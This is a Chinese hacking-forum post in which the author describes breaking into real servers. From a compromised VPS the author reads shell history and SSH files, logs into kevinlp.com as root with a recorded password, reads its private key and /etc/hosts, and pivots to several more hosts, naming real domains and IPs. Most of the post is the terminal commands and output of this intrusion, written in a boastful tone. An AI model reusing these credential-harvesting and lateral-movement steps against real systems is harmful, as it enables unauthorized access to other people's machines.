切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
385 上主机上线请注意2[复制链接]
发表于 2013-1-1 15:13:39 | 显示全部楼层 |!read_mode!
又是老肉鸡。。


  1. root@vps-kevinlp-0:~# ls .ssh/
  2. authorized_keys  known_hosts
  3. root@vps-kevinlp-0:~#
复制代码


有私人密匙 SSH记录只记录了本地的密码 没记录登出的密码。。

查看下他SSH登录


  1. root@vps-kevinlp-0:~# history | grep ssh
  2. 1001  ssh root@kevinlp.com
  3. 1009  ssh root@kevinlp.com
  4. 1011  history | grep ssh
复制代码
登录了一个主机 看看用记录的密码能登录上去不 果然 登录上去了


  1. brk<~/files/ssh> $ ssh root@kevinlp.com
  2. root@kevinlp.com's password:
  3. Linux kevinlp.com 2.6.32-305-ec2 #9-Ubuntu SMP Thu Apr 15 04:14:01 UTC 2010 i686 GNU/Linux
  4. Ubuntu 10.10

  5. Welcome to Ubuntu!
  6. * Documentation:  https://help.ubuntu.com/
  7. You have new mail.
  8. Last login: Fri Dec 14 01:14:19 2012 from 220.165.141.216
  9. root@kevinlp:~#
复制代码

查看SSH


  1. root@kevinlp:~# ls -la .ssh/
  2. total 36
  3. drwx------   2 root root 4096 Sep 17 22:43 .
  4. drwx------. 16 root root 4096 Nov 27 19:44 ..
  5. -rw-r--r--   1 root root 2785 Sep 23 23:36 authorized_keys
  6. -rw-------   1 root root 1679 Nov  3  2011 id_rsa
  7. -rw-r--r--   1 root root  398 Nov  3  2011 id_rsa.pub
  8. -rw-r--r--   1 root root 9725 Dec 14 01:16 known_hosts
  9. root@kevinlp:~#
复制代码

当看到id_rsa.pub我久非常开心 查看他SSH记录


  1. root@kevinlp:~# history | grep ssh
  2. 1102  ssh www.dollove.com
  3. 1253  ssh r1.whoops.in
  4. 1254  ssh vz@199.180.253.8
  5. 1255  ssh r1.whoops.in
  6. 1256  ssh vz@199.180.253.8
  7. 1257  ssh r1.whoops.in
  8. 1258  cd .ssh/
  9. 1262  ssh r1.whoops.in
  10. 1263  cd .ssh
  11. 1265  ssh r1.whoops.in
  12. 1266  ssh vz@199.180.253.8
  13. 1267  ssh r1.whoops.in
复制代码

很多 但是链接了都需要密码认真 可能没用SSH密匙继续微观 他一定要认证了密匙的主机!

  1. root@kevinlp:~# cat /etc/hosts
  2. 127.0.0.1               localhost.localdomain localhost
  3. 199.68.199.118                     kevinlp.com
  4. 74.63.212.71                     o2
  5. 74.63.212.41                     o1
  6. 199.68.199.17                    x2
  7. 66.85.142.167                    h1
复制代码

看到这个 我笑了
  1. root@kevinlp:~# ssh o2  
  2. Linux kevinlp 2.6.18-308.8.2.el5.028stab101.1 #1 SMP Sun Jun 24 20:25:35 MSD 2012 i686

  3. To access official Ubuntu documentation, please visit:

  4. http://help.ubuntu.com/

  5. Last login: Thu Dec 13 20:22:39 2012 from x1
  6. root@kevinlp:~#
复制代码

成功登录
  1. root@kevinlp:~# exit
  2. logout
  3. Connection to o2 closed.
  4. root@kevinlp:~# ssh o1
  5. Linux kevinlp 2.6.18-308.8.2.el5.028stab101.1 #1 SMP Sun Jun 24 20:25:35 MSD 2012 i686

  6. To access official Ubuntu documentation, please visit:

  7. http://help.ubuntu.com/

  8. Last login: Thu Oct 25 01:45:29 2012 from li460-182.members.linode.com
  9. root@kevinlp:~#
复制代码

成功登录
  1. root@kevinlp:~# ssh x2
  2. Linux xenvps.2 2.6.32-305-ec2 #9-Ubuntu SMP Thu Apr 15 04:14:01 UTC 2010 i686 GNU/Linux
  3. Ubuntu 10.10

  4. Welcome to Ubuntu!
  5. * Documentation:  https://help.ubuntu.com/
  6. Last login: Thu Dec 13 13:15:19 2012 from 101.78.211.54
  7. root@xenvps:~#
复制代码

成功登录等微观其他新肉鸡的时候 又发现N多的。。。。 上主机上线请注意我就说了SSH BACKDOOR咋不记录呢



相关帖子

操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2019-11-19 21:51

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部